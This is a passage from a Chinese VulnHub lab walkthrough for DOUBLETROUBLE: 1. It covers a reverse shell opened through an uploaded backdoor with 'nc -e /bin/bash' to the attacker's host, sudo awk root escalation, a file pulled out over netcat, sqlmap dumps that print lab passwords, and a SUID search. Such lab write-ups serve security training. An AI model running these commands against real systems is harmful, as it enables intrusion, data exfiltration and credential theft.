vulnhub靶场之DOUBLETROUBLE: 1( 三 )

 获取shell权限:
通过命令执行漏洞反弹shell,命令:http://192.168.4.195//uploads/users/542451-backdoor.php?cmd=nc -e /bin/bash 192.168.4.114 6688,kali端开启对6688端口的监听:nc -lvvp 6688,成功获得shell权限,然后通过:python3 -c 'import pty;pty.spawn("/bin/bash")'升级下shell 。

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
 提权:
查看下当前账户是否存在可以使用的特权命令,sudo -l,显示存在一个awk命令 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
查询下awk命令的提权方式进行提权,命令:sudo awk 'BEGIN {system("/bin/sh")}',提权成功 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
去root目录下寻找flag未找到,但是发现了一个虚拟机:doubletrouble.ova 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
 第二个靶场下载:
这里使用nc进行文件的传输,靶机中:nc 192.168.4.114 8899 < doubletrouble.ova,kali中:nc -lvvp 8899 > doubletrouble.ova 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
第二个靶场的信息收集:
本地使用vbox打开之后使用nmap扫描下地址和服务和扫描第一个靶机一样,发现主机ip:192.168.4.106,该主机同样开放了22和80端口、ssh和web服务 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
访问下web服务发现是一个登录窗口,目录扫描也未发现有用的目录文件 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
SQL注入:
使用sqlmap测试下注入,看是否存在注入漏洞,命令:sqlmap -u "http://192.168.4.106/index.php" -forms,发现存在时间注入 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
然后进行数据库的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -dbs,成功获取到数据库:doubletrouble和information_schema 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
然后进行数据库表名的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble --tables,成功获得表:users 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
然后进行表信息的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble -T users --dump,成功获得两组账户名和密码:montreux/GfsZxc1、clapton/ZubZub99 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
获取shell:
通过xshell使用账户名和密码进行尝试连接,发现clapton/ZubZub99连接成功获得shell权限 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
在当前账户下发现user.txt文件,获取到第一个flag信息 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
提权:
查看下当前账户是否存在可以使用的特权命令,sudo -l,显示不存在 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
查看下具有root权限的文件,命令:find / -perm -4000 -type f 2>/dev/null,发现存在一个/usr/lib/eject/dmcrypt-get-device,在https://www.exploit-db.com/网站查询可以可以利用的漏洞,发现存在本地提权漏洞,但是经过尝试均失败 。

经验总结扩展阅读